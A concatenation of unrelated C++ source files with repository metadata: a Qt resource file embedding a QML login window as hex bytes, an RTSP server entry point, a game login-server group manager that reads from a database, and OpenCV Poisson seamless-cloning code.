0xe7,0x4,0x87,0x4f,0xb0,0x51,0xa2,0xe4,0xf7,0xb2,0xd,0x2,0x9,0xca,0xce,0x39,
0xc5,0xad,0xc0,0x9,0xac,0x93,0xf3,0x5d,0x54,0xf7,0xed,0x98,0xd1,0x20,0x17,0x98,
0x44,0x4b,0x6,0x2c,0xe7,0xa0,0xbb,0x54,0xdf,0x7c,0x14,0x77,0xa6,0x46,0x26,0x3e,
0x1b,0x5c,0x56,0x61,0x82,0x8,0xdc,0xbc,0x57,0x71,0xe3,0xe,0xb,0x2b,0xa8,0xcf,
0xad,0x96,0x37,0xa3,0x93,0x46,0xc7,0xeb,0xdf,0x4f,0x8,0x39,0xd1,0x85,0x68,0x2b,
0xe7,0xc3,0xdf,0xff,0x50,0x62,0x97,0xdb,0xda,0x15,0x93,0x55,0xe4,0xb,0xd3,0x74,
0x8c,0x6b,0x46,0x1e,0x15,0xc8,0x9f,0x28,0x57,0xb5,0x6b,0x7,0x20,0x6d,0x87,0x12,
0x68,0xae,0x15,0xc4,0xec,0x4d,0x10,0x57,0xb,0x42,0xd2,0x4a,0xb8,0xd3,0x8a,0x38,
0xdd,0xb2,0x3e,0xe2,0xea,0x8e,0x5d,0x1e,0xe1,0xb3,0xfd,0x7c,0xeb,0x58,0xec,0x58,
0x78,0xb0,0xec,0xab,0x5a,0xf6,0x2f,0xa6,0xec,0xff,0xee,0xd9,0x4b,0x46,0xe5,0xd4,
0x13,0xfd,0xd7,0xdf,0xfd,0xb0,0x34,0xd9,0x6f,0xf0,0x4e,0x7f,0x5d,
// /home/sanchelozzz/GIT/DYN_APP-D/DYN_APP/main.qml
0x0,0x0,0x3,0x40,
0x69,
0x6d,0x70,0x6f,0x72,0x74,0x20,0x51,0x74,0x51,0x75,0x69,0x63,0x6b,0x20,0x32,0x2e,
0x31,0x32,0xa,0x69,0x6d,0x70,0x6f,0x72,0x74,0x20,0x51,0x74,0x51,0x75,0x69,0x63,
0x6b,0x2e,0x43,0x6f,0x6e,0x74,0x72,0x6f,0x6c,0x73,0x20,0x32,0x2e,0x35,0xa,0x69,
0x6d,0x70,0x6f,0x72,0x74,0x20,0x51,0x74,0x51,0x75,0x69,0x63,0x6b,0x2e,0x4c,0x61,
0x79,0x6f,0x75,0x74,0x73,0x20,0x31,0x2e,0x31,0x32,0xa,0xa,0x41,0x70,0x70,0x6c,
0x69,0x63,0x61,0x74,0x69,0x6f,0x6e,0x57,0x69,0x6e,0x64,0x6f,0x77,0x20,0x7b,0xa,
0x20,0x20,0x20,0x20,0x69,0x64,0x3a,0x20,0x5f,0x62,0x69,0x67,0x4d,0x41,0x4d,0x41,
0xa,0x20,0x20,0x20,0x20,0x76,0x69,0x73,0x69,0x62,0x6c,0x65,0x3a,0x20,0x74,0x72,
0x75,0x65,0xa,0x20,0x20,0x20,0x20,0x77,0x69,0x64,0x74,0x68,0x3a,0x20,0x36,0x34,
0x30,0xa,0x20,0x20,0x20,0x20,0x68,0x65,0x69,0x67,0x68,0x74,0x3a,0x20,0x34,0x38,
0x30,0xa,0x20,0x20,0x20,0x20,0x74,0x69,0x74,0x6c,0x65,0x3a,0x20,0x71,0x73,0x54,
0x72,0x28,0x22,0x44,0x79,0x6e,0x5f,0x41,0x50,0x50,0x20,0x3a,0x44,0x22,0x29,0xa,
0xa,0x20,0x20,0x20,0x20,0x46,0x6f,0x6e,0x74,0x4c,0x6f,0x61,0x64,0x65,0x72,0x20,
0x7b,0x69,0x64,0x3a,0x20,0x6b,0x6f,0x6d,0x69,0x6b,0x61,0x5f,0x68,0x61,0x6e,0x64,
0x3b,0x20,0x73,0x6f,0x75,0x72,0x63,0x65,0x3a,0x20,0x22,0x2f,0x66,0x6f,0x6e,0x74,
0x73,0x2f,0x66,0x6f,0x6e,0x74,0x73,0x2f,0x6b,0x6f,0x6d,0x69,0x6b,0x61,0x2d,0x68,
0x61,0x6e,0x64,0x2e,0x74,0x74,0x66,0x22,0x7d,0xa,0xa,0x20,0x20,0x20,0x20,0x72,
0x65,0x61,0x64,0x6f,0x6e,0x6c,0x79,0x20,0x70,0x72,0x6f,0x70,0x65,0x72,0x74,0x79,
0x20,0x63,0x6f,0x6c,0x6f,0x72,0x20,0x62,0x67,0x43,0x6f,0x6c,0x6f,0x72,0x3a,0x20,
0x22,0x23,0x32,0x36,0x32,0x36,0x32,0x42,0x22,0xa,0x20,0x20,0x20,0x20,0x72,0x65,
0x61,0x64,0x6f,0x6e,0x6c,0x79,0x20,0x70,0x72,0x6f,0x70,0x65,0x72,0x74,0x79,0x20,
0x63,0x6f,0x6c,0x6f,0x72,0x20,0x66,0x69,0x65,0x6c,0x64,0x42,0x67,0x43,0x6f,0x6c,
0x6f,0x72,0x3a,0x20,0x22,0x23,0x33,0x34,0x33,0x34,0x33,0x39,0x22,0xa,0x20,0x20,
0x20,0x20,0x72,0x65,0x61,0x64,0x6f,0x6e,0x6c,0x79,0x20,0x70,0x72,0x6f,0x70,0x65,
0x72,0x74,0x79,0x20,0x63,0x6f,0x6c,0x6f,0x72,0x20,0x74,0x65,0x78,0x74,0x43,0x6f,
0x6c,0x6f,0x72,0x3a,0x20,0x22,0x77,0x68,0x69,0x74,0x65,0x22,0xa,0x20,0x20,0x20,
0x20,0x72,0x65,0x61,0x64,0x6f,0x6e,0x6c,0x79,0x20,0x70,0x72,0x6f,0x70,0x65,0x72,
0x74,0x79,0x20,0x69,0x6e,0x74,0x20,0x64,0x65,0x66,0x4d,0x61,0x72,0x67,0x69,0x6e,
0x3a,0x20,0x31,0x30,0xa,0x20,0x20,0x20,0x20,0x72,0x65,0x61,0x64,0x6f,0x6e,0x6c,
0x79,0x20,0x70,0x72,0x6f,0x70,0x65,0x72,0x74,0x79,0x20,0x69,0x6e,0x74,0x20,0x64,
0x65,0x66,0x52,0x61,0x64,0x69,0x75,0x73,0x3a,0x20,0x31,0x30,0xa,0xa,0x20,0x20,
0x20,0x20,0x53,0x74,0x61,0x63,0x6b,0x56,0x69,0x65,0x77,0x20,0x7b,0xa,0x20,0x20,
0x20,0x20,0x20,0x20,0x20,0x20,0x69,0x64,0x3a,0x20,0x5f,0x6d,0x61,0x69,0x6e,0x53,
0x74,0x61,0x63,0x6b,0x56,0x69,0x65,0x77,0xa,0x20,0x20,0x20,0x20,0x20,0x20,0x20,
0x20,0x61,0x6e,0x63,0x68,0x6f,0x72,0x73,0x2e,0x66,0x69,0x6c,0x6c,0x3a,0x20,0x70,
0x61,0x72,0x65,0x6e,0x74,0xa,0x20,0x20,0x20,0x20,0x20,0x20,0x20,0x20,0x69,0x6e,
0x69,0x74,0x69,0x61,0x6c,0x49,0x74,0x65,0x6d,0x3a,0x20,0x5f,0x61,0x75,0x74,0x68,
0x50,0x61,0x67,0x65,0xa,0xa,0xa,0xa,0x20,0x20,0x20,0x20,0x7d,0xa,0xa,0x20,
0x20,0x20,0x20,0x4c,0x6f,0x67,0x69,0x6e,0x50,0x61,0x67,0x65,0x20,0x7b,0xa,0x20,
0x20,0x20,0x20,0x20,0x20,0x20,0x20,0x69,0x64,0x3a,0x20,0x5f,0x61,0x75,0x74,0x68,
0x50,0x61,0x67,0x65,0xa,0x20,0x20,0x20,0x20,0x20,0x20,0x20,0x20,0x62,0x61,0x63,
0x6b,0x43,0x6f,0x6c,0x6f,0x72,0x3a,0x20,0x62,0x67,0x43,0x6f,0x6c,0x6f,0x72,0xa,
0xa,0x20,0x20,0x20,0x20,0x20,0x20,0x20,0x20,0x6f,0x6e,0x42,0x75,0x74,0x74,0x6f,
0x6e,0x43,0x6c,0x69,0x63,0x6b,0x65,0x64,0x3a,0x20,0x7b,0xa,0x20,0x20,0x20,0x20,
0x20,0x20,0x20,0x20,0x20,0x20,0x20,0x20,0x20,0x20,0x20,0x5f,0x6d,0x61,0x69,0x6e,
0x53,0x74,0x61,0x63,0x6b,0x56,0x69,0x65,0x77,0x2e,0x70,0x75,0x73,0x68,0x28,0x5f,
0x6d,0x61,0x69,0x6e,0x50,0x61,0x67,0x65,0x29,0x3b,0xa,0x20,0x20,0x20,0x20,0x20,
0x20,0x20,0x20,0x7d,0xa,0x20,0x20,0x20,0x20,0x7d,0xa,0x20,0x20,0x20,0x20,0x41,
0x70,0x70,0x4d,0x65,0x6e,0x75,0x20,0x7b,0xa,0x20,0x20,0x20,0x20,0x20,0x20,0x20,
0x20,0x69,0x64,0x3a,0x20,0x5f,0x6d,0x61,0x69,0x6e,0x50,0x61,0x67,0x65,0xa,0xa,
0x20,0x20,0x20,0x20,0x20,0x20,0x20,0x20,0x76,0x69,0x73,0x69,0x62,0x6c,0x65,0x3a,
0x20,0x66,0x61,0x6c,0x73,0x65,0xa,0x20,0x20,0x20,0x20,0x7d,0xa,0x7d,0xa,
};
static const unsigned char qt_resource_name[] = {
// AppMenu.qml
0x0,0xb,
0xc,0xc8,0xbe,0x5c,
0x0,0x41,
0x0,0x70,0x0,0x70,0x0,0x4d,0x0,0x65,0x0,0x6e,0x0,0x75,0x0,0x2e,0x0,0x71,0x0,0x6d,0x0,0x6c,
// LoginPage.qml
0x0,0xd,
0x1,0x6c,0x53,0xbc,
0x0,0x4c,
0x0,0x6f,0x0,0x67,0x0,0x69,0x0,0x6e,0x0,0x50,0x0,0x61,0x0,0x67,0x0,0x65,0x0,0x2e,0x0,0x71,0x0,0x6d,0x0,0x6c,
// PageChat.qml
0x0,0xc,
0x4,0x48,0xe7,0x1c,
0x0,0x50,
0x0,0x61,0x0,0x67,0x0,0x65,0x0,0x43,0x0,0x68,0x0,0x61,0x0,0x74,0x0,0x2e,0x0,0x71,0x0,0x6d,0x0,0x6c,
// AppsIcons.qml
0x0,0xd,
0x6,0xbc,0xaa,0x5c,
0x0,0x41,
0x0,0x70,0x0,0x70,0x0,0x73,0x0,0x49,0x0,0x63,0x0,0x6f,0x0,0x6e,0x0,0x73,0x0,0x2e,0x0,0x71,0x0,0x6d,0x0,0x6c,
// PageMenu.qml
0x0,0xc,
0x2,0x9b,0xe4,0x5c,
0x0,0x50,
0x0,0x61,0x0,0x67,0x0,0x65,0x0,0x4d,0x0,0x65,0x0,0x6e,0x0,0x75,0x0,0x2e,0x0,0x71,0x0,0x6d,0x0,0x6c,
// main.qml
0x0,0x8,
0x8,0x1,0x5a,0x5c,
0x0,0x6d,
0x0,0x61,0x0,0x69,0x0,0x6e,0x0,0x2e,0x0,0x71,0x0,0x6d,0x0,0x6c,
};
static const unsigned char qt_resource_struct[] = {
// :
0x0,0x0,0x0,0x0,0x0,0x2,0x0,0x0,0x0,0x6,0x0,0x0,0x0,0x1,
0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,
// :/LoginPage.qml
0x0,0x0,0x0,0x1c,0x0,0x1,0x0,0x0,0x0,0x1,0x0,0x0,0x1,0x6b,
0x0,0x0,0x1,0x75,0xf2,0xa,0x5,0x8b,
// :/PageMenu.qml
0x0,0x0,0x0,0x7a,0x0,0x1,0x0,0x0,0x0,0x1,0x0,0x0,0x8,0x75,
0x0,0x0,0x1,0x75,0xf5,0x41,0xa5,0x8b,
// :/PageChat.qml
0x0,0x0,0x0,0x3c,0x0,0x1,0x0,0x0,0x0,0x1,0x0,0x0,0x4,0x7,
0x0,0x0,0x1,0x75,0xf5,0x55,0x87,0x4,
// :/AppsIcons.qml
0x0,0x0,0x0,0x5a,0x0,0x0,0x0,0x0,0x0,0x1,0x0,0x0,0x5,0xf1,
0x0,0x0,0x1,0x75,0xf5,0x47,0xc4,0xa7,
// :/main.qml
0x0,0x0,0x0,0x98,0x0,0x0,0x0,0x0,0x0,0x1,0x0,0x0,0xa,0x67,
0x0,0x0,0x1,0x75,0xf2,0x35,0x50,0xc7,
// :/AppMenu.qml
0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x1,0x0,0x0,0x0,0x0,
0x0,0x0,0x1,0x75,0xf5,0x39,0xf7,0x46,
};
#ifdef QT_NAMESPACE
# define QT_RCC_PREPEND_NAMESPACE(name) ::QT_NAMESPACE::name
# define QT_RCC_MANGLE_NAMESPACE0(x) x
# define QT_RCC_MANGLE_NAMESPACE1(a, b) a##_##b
# define QT_RCC_MANGLE_NAMESPACE2(a, b) QT_RCC_MANGLE_NAMESPACE1(a,b)
# define QT_RCC_MANGLE_NAMESPACE(name) QT_RCC_MANGLE_NAMESPACE2( \
QT_RCC_MANGLE_NAMESPACE0(name), QT_RCC_MANGLE_NAMESPACE0(QT_NAMESPACE))
#else
# define QT_RCC_PREPEND_NAMESPACE(name) name
# define QT_RCC_MANGLE_NAMESPACE(name) name
#endif
#ifdef QT_NAMESPACE
namespace QT_NAMESPACE {
#endif
bool qRegisterResourceData(int, const unsigned char *, const unsigned char *, const unsigned char *);
bool qUnregisterResourceData(int, const unsigned char *, const unsigned char *, const unsigned char *);
#if defined(__ELF__) || defined(__APPLE__)
static inline unsigned char qResourceFeatureZlib()
{
extern const unsigned char qt_resourceFeatureZlib;
return qt_resourceFeatureZlib;
}
#else
unsigned char qResourceFeatureZlib();
#endif
#ifdef QT_NAMESPACE
}
#endif
int QT_RCC_MANGLE_NAMESPACE(qInitResources_qml)();
int QT_RCC_MANGLE_NAMESPACE(qInitResources_qml)()
{
int version = 3;
QT_RCC_PREPEND_NAMESPACE(qRegisterResourceData)
(version, qt_resource_struct, qt_resource_name, qt_resource_data);
return 1;
}
int QT_RCC_MANGLE_NAMESPACE(qCleanupResources_qml)();
int QT_RCC_MANGLE_NAMESPACE(qCleanupResources_qml)()
{
int version = 3;
version += QT_RCC_PREPEND_NAMESPACE(qResourceFeatureZlib());
QT_RCC_PREPEND_NAMESPACE(qUnregisterResourceData)
(version, qt_resource_struct, qt_resource_name, qt_resource_data);
return 1;
}
namespace {
struct initializer {
initializer() { QT_RCC_MANGLE_NAMESPACE(qInitResources_qml)(); }
~initializer() { QT_RCC_MANGLE_NAMESPACE(qCleanupResources_qml)(); }
} dummy;
}
|
e2218ea326a0b4531485c94970f3d5dca93abc93
|
29d6dc33d088ffb50c196be9bad805197406e844
|
/rtspServer/Main.cpp
|
16a62513c05efa2e50934f067d5b07b6b5b1d374
|
[] |
no_license
|
Fsing/MuiscPlayer
|
cb4320b93fdcafe474a576793437a5d1e4907666
|
18608feea0e415c15e40ee80417f49f6f037924f
|
refs/heads/master
| 2020-04-09T08:01:21.806910
| 2019-05-11T03:15:54
| 2019-05-11T03:15:54
| 160,179,636
| 1
| 0
| null | null | null | null |
UTF-8
|
C++
| false
| false
| 554
|
cpp
|
Main.cpp
|
#include "Server/rtspsvr.h"
#include "printlog.h"
#include <pthread.h>
//#include <signal.h>
#include <exception>
#include <iostream>
int main( void )
{
CRtspSvr rtsp_svr;
try{
rtsp_svr.Start( 8554 );
}catch(std::exception &e){
std::cout << e.what() << std::endl;
}
//打开服务器,并进行监听。
//服务器有个监听socket,当有客户端连接时,建立新的会话线程,保存新连接的socket,放到m_session_map
//然后监听socket继续进行监听
getchar();
return 0;
}
|
e889e08f196362611ce6d13a65686f0e3c592bbd
|
fc056b2e63f559087240fed1a77461eb72b2bf8e
|
/src/server/loginserver/GameServerGroupInfoManager.cpp
|
5b30e2595f2c402f327ec62af0772e8f799d25a5
|
[] |
no_license
|
opendarkeden/server
|
0bd3c59b837b1bd6e8c52c32ed6199ceb9fbee38
|
3c2054f5d9e16196fc32db70b237141d4a9738d1
|
refs/heads/master
| 2023-02-18T20:21:30.398896
| 2023-02-15T16:42:07
| 2023-02-15T16:42:07
| 42,562,951
| 48
| 37
| null | 2023-02-15T16:42:10
| 2015-09-16T03:42:35
|
C++
|
UHC
|
C++
| false
| false
| 7,456
|
cpp
|
GameServerGroupInfoManager.cpp
|
//----------------------------------------------------------------------
//
// Filename : GameServerGroupInfoManager.cpp
// Written By : Reiot
// Description :
//
//----------------------------------------------------------------------
// include files
#include "GameServerGroupInfoManager.h"
#include "database/DatabaseManager.h"
#include "database/Connection.h"
#include "database/Statement.h"
#include "database/Result.h"
#include "database/DB.h"
//----------------------------------------------------------------------
// constructor
//----------------------------------------------------------------------
GameServerGroupInfoManager::GameServerGroupInfoManager ()
throw ()
{
m_MaxWorldID = 0;
}
//----------------------------------------------------------------------
// destructor
//----------------------------------------------------------------------
GameServerGroupInfoManager::~GameServerGroupInfoManager ()
throw ()
{
clear();
}
//----------------------------------------------------------------------
// clear GameServerGroupInfos
//----------------------------------------------------------------------
void GameServerGroupInfoManager::clear()
throw ( Error )
{
__BEGIN_TRY
// hashmap 안의 각 pair 의 second, 즉 GameServerGroupInfo 객체만을 삭제하고
// pair 자체는 그대로 둔다. (GameServerGroupInfo가 힙에 생성되어 있다는 것에
// 유의하라. 즉 필살삭제를 해야 한다. 하긴, GSIM이 destruct 된다는 것은
// 로그인 서버가 셧다운된다는 것을 의미하니깐.. - -; )
for( int i = 1 ; i < m_MaxWorldID; i++ ) {
for ( HashMapGameServerGroupInfo::iterator itr = m_GameServerGroupInfos[i].begin() ;
itr != m_GameServerGroupInfos[i].end() ;
itr ++ ) {
SAFE_DELETE(itr->second);
}
// 이제 해쉬맵안에 있는 모든 pair 들을 삭제한다.
m_GameServerGroupInfos[i].clear();
}
SAFE_DELETE_ARRAY(m_GameServerGroupInfos);
__END_CATCH
}
//----------------------------------------------------------------------
// initialize GSIM
//----------------------------------------------------------------------
void GameServerGroupInfoManager::init ()
throw ( Error )
{
__BEGIN_TRY
// just load data from GameServerGroupInfo table
load();
// just print to cout
cout << toString() << endl;
__END_CATCH
}
//----------------------------------------------------------------------
// load data from database
//----------------------------------------------------------------------
void GameServerGroupInfoManager::load ()
throw ( Error )
{
__BEGIN_TRY
// clear();
Statement * pStmt = NULL;
BEGIN_DB
{
pStmt = g_pDatabaseManager->getConnection("DARKEDEN")->createStatement();
Result* pResult = pStmt->executeQuery(
"SELECT MAX(WorldID) FROM GameServerGroupInfo"
);
if (pResult->getRowCount() == 0)
{
throw Error("GameServerGroupInfo TABLE does not exist!");
}
pResult->next();
m_MaxWorldID = pResult->getInt(1) + 2;
SAFE_DELETE(pStmt);
}
END_DB(pStmt)
m_GameServerGroupInfos = new HashMapGameServerGroupInfo[m_MaxWorldID];
try {
pStmt = g_pDatabaseManager->getConnection("DARKEDEN")->createStatement();
Result * pResult = pStmt->executeQuery(
"SELECT WorldID, GroupID, GroupName, Stat FROM GameServerGroupInfo"
);
while ( pResult->next() ) {
GameServerGroupInfo * pGameServerGroupInfo = new GameServerGroupInfo();
WorldID_t WorldID = pResult->getInt(1);
pGameServerGroupInfo->setWorldID( WorldID );
pGameServerGroupInfo->setGroupID( pResult->getInt(2) );
pGameServerGroupInfo->setGroupName( pResult->getString(3) );
pGameServerGroupInfo->setStat( pResult->getInt(4) );
addGameServerGroupInfo( pGameServerGroupInfo, WorldID );
}
// 필살 삭제!
SAFE_DELETE( pStmt );
} catch ( SQLQueryException & sqe ) {
// 필살 삭제!
SAFE_DELETE( pStmt );
throw Error(sqe.toString());
} catch ( Throwable & t ) {
SAFE_DELETE( pStmt );
cout << t.toString() << endl;
}
__END_CATCH
}
//----------------------------------------------------------------------
// add info
//----------------------------------------------------------------------
void GameServerGroupInfoManager::addGameServerGroupInfo ( GameServerGroupInfo * pGameServerGroupInfo, WorldID_t WorldID )
throw ( DuplicatedException )
{
__BEGIN_TRY
int GroupID = pGameServerGroupInfo->getGroupID();
HashMapGameServerGroupInfo::iterator itr = m_GameServerGroupInfos[WorldID].find( GroupID );
if ( itr != m_GameServerGroupInfos[WorldID].end() )
throw DuplicatedException("duplicated game-server nickname");
cout << "addGameServerGroupInfo: " << (int)WorldID << ", " << GroupID
<< " : " << pGameServerGroupInfo->getGroupName().c_str() << endl;
m_GameServerGroupInfos[WorldID][GroupID] = pGameServerGroupInfo;
__END_CATCH
}
//----------------------------------------------------------------------
// delete info
//----------------------------------------------------------------------
void GameServerGroupInfoManager::deleteGameServerGroupInfo ( const ServerGroupID_t GroupID, WorldID_t WorldID )
throw ( NoSuchElementException )
{
__BEGIN_TRY
HashMapGameServerGroupInfo::iterator itr = m_GameServerGroupInfos[WorldID].find( GroupID );
if ( itr != m_GameServerGroupInfos[WorldID].end() ) {
// GameServerGroupInfo 를 삭제한다.
delete itr->second;
// pair를 삭제한다.
m_GameServerGroupInfos[WorldID].erase( itr );
} else {
// 그런 게임서버인포 객체를 찾을 수 없을 때
throw NoSuchElementException();
}
__END_CATCH
}
//----------------------------------------------------------------------
// get GameServerGroupinfo by ServerGroupID
//----------------------------------------------------------------------
GameServerGroupInfo * GameServerGroupInfoManager::getGameServerGroupInfo ( const ServerGroupID_t GroupID, WorldID_t WorldID ) const
throw ( NoSuchElementException )
{
__BEGIN_TRY
if( WorldID >= m_MaxWorldID ) {
// 그런 게임서버인포 객체를 찾을 수 없었을 때
throw NoSuchElementException();
}
GameServerGroupInfo * pGameServerGroupInfo = NULL;
HashMapGameServerGroupInfo::const_iterator itr = m_GameServerGroupInfos[WorldID].find( GroupID );
if ( itr != m_GameServerGroupInfos[WorldID].end() ) {
pGameServerGroupInfo = itr->second;
} else {
// 그런 게임서버인포 객체를 찾을 수 없었을 때
throw NoSuchElementException();
}
return pGameServerGroupInfo;
__END_CATCH
}
//----------------------------------------------------------------------
// get debug string
//----------------------------------------------------------------------
string GameServerGroupInfoManager::toString () const
throw ()
{
__BEGIN_TRY
StringStream msg;
msg << "GameServerGroupInfoManager(\n";
for ( int i = 1; i < m_MaxWorldID ; i++ ) {
if ( m_GameServerGroupInfos[i].empty() ) {
msg << "EMPTY";
} else {
//--------------------------------------------------
// *OPTIMIZATION*
//
// for_each()를 사용할 것
//--------------------------------------------------
for ( HashMapGameServerGroupInfo::const_iterator itr = m_GameServerGroupInfos[i].begin() ;
itr != m_GameServerGroupInfos[i].end() ;
itr ++ )
msg << itr->second->toString() << '\n';
}
}
msg << ")";
return msg.toString();
__END_CATCH
}
// global variable definition
GameServerGroupInfoManager * g_pGameServerGroupInfoManager = NULL;
|
8bdf3e4af10523d6bf3894343ad8958545346e80
|
6dac5e8d4101b44e74ee1b458bf29e8f33e3612d
|
/src/clone.cpp
|
fd7dc0a1a466f2536bd884cf85327bd0a1342e0a
|
[] |
no_license
|
jnulzl/efficient_quadtree
|
64507fa6578e8080ec36c5ea3286b9044b2cec03
|
13f51fb3a9127305f5ef90bf334c1b38c8c4c78a
|
refs/heads/master
| 2022-11-13T07:57:23.865325
| 2020-07-05T03:38:03
| 2020-07-05T03:38:03
| 277,222,335
| 0
| 0
| null | 2020-07-05T03:11:58
| 2020-07-05T03:11:57
| null |
UTF-8
|
C++
| false
| false
| 7,503
|
cpp
|
clone.cpp
|
#include "clone.h"
#include "poisson_solver.h"
#include <opencv2/imgproc.hpp>
bool findOverlap(cv::InputArray background,
cv::InputArray foreground,
int offsetX, int offsetY,
cv::Rect &rBackground,
cv::Rect &rForeground)
{
cv::Mat bg = background.getMat();
cv::Mat fg = foreground.getMat();
rBackground = cv::Rect(0, 0, bg.cols, bg.rows) &
cv::Rect(offsetX, offsetY, fg.cols, fg.rows);
// Compensate for negative offsets. If offset < 0, offset in foreground is positive.
rForeground = cv::Rect(std::max<int>(-offsetX, 0),
std::max<int>(-offsetY, 0),
rBackground.width,
rBackground.height);
return rForeground.area() > 0;
}
void computeMixedGradientVectorField(cv::InputArray background,
cv::InputArray foreground,
cv::OutputArray vx_,
cv::OutputArray vy_)
{
cv::Mat bg = background.getMat();
cv::Mat fg = foreground.getMat();
const int channels = bg.channels();
vx_.create(bg.size(), CV_MAKETYPE(CV_32F, channels));
vy_.create(bg.size(), CV_MAKETYPE(CV_32F, channels));
cv::Mat vx = vx_.getMat();
cv::Mat vy = vy_.getMat();
cv::Mat kernelx = (cv::Mat_<float>(1, 3) << -0.5, 0, 0.5);
cv::Mat kernely = (cv::Mat_<float>(3, 1) << -0.5, 0, 0.5);
cv::Mat vxf, vyf, vxb, vyb;
cv::filter2D(fg, vxf, CV_32F, kernelx, cv::Point(-1,-1), 0, cv::BORDER_REPLICATE);
cv::filter2D(fg, vyf, CV_32F, kernely, cv::Point(-1,-1), 0, cv::BORDER_REPLICATE);
cv::filter2D(bg, vxb, CV_32F, kernelx, cv::Point(-1,-1), 0, cv::BORDER_REPLICATE);
cv::filter2D(bg, vyb, CV_32F, kernely, cv::Point(-1,-1), 0, cv::BORDER_REPLICATE);
for(int id = 0; id <= (vx.rows * vx.cols * channels - channels); ++id)
{
const cv::Vec2f g[2] = {
cv::Vec2f(vxf.ptr<float>()[id], vyf.ptr<float>()[id]),
cv::Vec2f(vxb.ptr<float>()[id], vyb.ptr<float>()[id])
};
int which = (g[0].dot(g[0]) > g[1].dot(g[1])) ? 0 : 1;
vx.ptr<float>()[id] = g[which][0];
vy.ptr<float>()[id] = g[which][1];
}
}
void computeWeightedGradientVectorField(cv::InputArray background,
cv::InputArray foreground,
cv::OutputArray vx,
cv::OutputArray vy,
float weightForeground)
{
cv::Mat bg = background.getMat();
cv::Mat fg = foreground.getMat();
cv::Mat kernelx = (cv::Mat_<float>(1, 3) << -0.5, 0, 0.5);
cv::Mat kernely = (cv::Mat_<float>(3, 1) << -0.5, 0, 0.5);
cv::Mat vxf, vyf, vxb, vyb;
cv::filter2D(fg, vxf, CV_32F, kernelx, cv::Point(-1,-1), 0, cv::BORDER_REPLICATE);
cv::filter2D(fg, vyf, CV_32F, kernely, cv::Point(-1,-1), 0, cv::BORDER_REPLICATE);
cv::filter2D(bg, vxb, CV_32F, kernelx, cv::Point(-1,-1), 0, cv::BORDER_REPLICATE);
cv::filter2D(bg, vyb, CV_32F, kernely, cv::Point(-1,-1), 0, cv::BORDER_REPLICATE);
cv::addWeighted(vxf, weightForeground, vxb, 1.f - weightForeground, 0, vx);
cv::addWeighted(vyf, weightForeground, vyb, 1.f - weightForeground, 0, vy);
}
void seamlessCloneNaive(cv::InputArray background,
cv::InputArray foreground,
cv::InputArray foregroundMask,
int offsetX,
int offsetY,
cv::OutputArray destination,
CloneType type)
{
// Copy original background as we only solve for the overlapping area of the translated foreground mask.
background.getMat().copyTo(destination);
// Find overlapping region. We will only perform on this region
cv::Rect rbg, rfg;
if (!findOverlap(background, foreground, offsetX, offsetY, rbg, rfg))
return;
// Compute the guidance vector field
cv::Mat vx, vy;
computeWeightedGradientVectorField(background.getMat()(rbg),foreground.getMat()(rfg), vx, vy, 1.f);
// For the Poisson equation the divergence of the guidance field is necessary.
cv::Mat vxx, vyy;
cv::Mat kernelx = (cv::Mat_<float>(1, 3) << -0.5, 0, 0.5);
cv::Mat kernely = (cv::Mat_<float>(3, 1) << -0.5, 0, 0.5);
cv::filter2D(vx, vxx, CV_32F, kernelx);
cv::filter2D(vy, vyy, CV_32F, kernely);
cv::Mat f = vxx + vyy;
cv::Mat boundaryMask(rfg.size(), CV_8UC1);
cv::threshold(foregroundMask.getMat()(rfg), boundaryMask, UNKNOWN, DIRICHLET_BD, cv::THRESH_BINARY_INV);
cv::rectangle(boundaryMask, cv::Rect(0, 0, boundaryMask.cols, boundaryMask.rows), DIRICHLET_BD, 1);
cv::Mat boundaryValues(rfg.size(), CV_MAKETYPE(CV_32F, background.channels()));
background.getMat()(rbg).convertTo(boundaryValues, CV_32F);
// Solve Poisson equation
cv::Mat result;
solvePoissonEquations(f,
boundaryMask,
boundaryValues,
result);
// Copy result to destination image.
result.convertTo(destination.getMat()(rbg), CV_8U);
}
void seamlessClone(cv::InputArray background,
cv::InputArray foreground,
cv::InputArray foregroundMask,
int offsetX,
int offsetY,
cv::OutputArray destination,
CloneType type)
{
// Copy original background as we only solve for the overlapping area of the translated foreground mask.
background.getMat().copyTo(destination);
// Find overlapping region. We will only perform on this region
cv::Rect rbg, rfg;
if (!findOverlap(background, foreground, offsetX, offsetY, rbg, rfg))
return;
cv::Mat fore, back;
cv::Mat lap = (cv::Mat_<float>(3, 3) << 0.0, -1, 0.0, -1, 4, -1, 0.0, -1, 0.0);
cv::filter2D(foreground.getMat()(rfg), fore, CV_32F, lap, cv::Point(-1,-1), 0, cv::BORDER_REPLICATE);
cv::filter2D(background.getMat()(rbg), back, CV_32F, lap, cv::Point(-1,-1), 0, cv::BORDER_REPLICATE);
cv::Mat f = fore;
cv::Mat boundaryMask(rfg.size(), CV_8UC1);
cv::threshold(foregroundMask.getMat()(rfg), boundaryMask, UNKNOWN, DIRICHLET_BD, cv::THRESH_BINARY_INV);
cv::rectangle(boundaryMask, cv::Rect(0, 0, boundaryMask.cols, boundaryMask.rows), DIRICHLET_BD, 1);
cv::Mat boundaryValues(rfg.size(), CV_MAKETYPE(CV_32F, background.channels()));
background.getMat()(rbg).convertTo(boundaryValues, CV_32F);
cv::Mat foreValues(rfg.size(), CV_MAKETYPE(CV_32F, foreground.channels()));
foreground.getMat()(rfg).convertTo(foreValues, CV_32F);
// Solve Poisson equation
cv::Mat result;
/*
solvePoissonEquations(f,
boundaryMask,
boundaryValues,
result);
*/
solvePoissonEquationsFast(foreValues,
boundaryMask,
boundaryValues,
result);
// Copy result to destination image.
result.convertTo(destination.getMat()(rbg), CV_8U);
}
|
239e8bf9206e2fdd9b04b7b125e9de6ba2e6ceda
|
1dcfe3eeea910baba7387a8784bf08e651616c8a
|
/src/qsshpush.cpp
|
f7534709f1fbf87bbd8800c3d3310247ddf9ee95
|
[] |
no_license
|
smurfomen/QSsh
|
db29709ccb5bb720afdba60ff748aff391e1d69a
|
a807a5c2836bf4b3fa428c0ce47e0d665d130382
|
refs/heads/master
| 2023-04-05T08:22:39.775774
| 2021-04-06T12:28:02
| 2021-04-06T12:28:02
| 353,711,206
| 0
| 0
| null | null | null | null |
UTF-8
|
C++
| false
| false
| 1,980
|
cpp
|
qsshpush.cpp
|
#include "qsshpush.h"
#include <sys/stat.h>
#include <QFile>
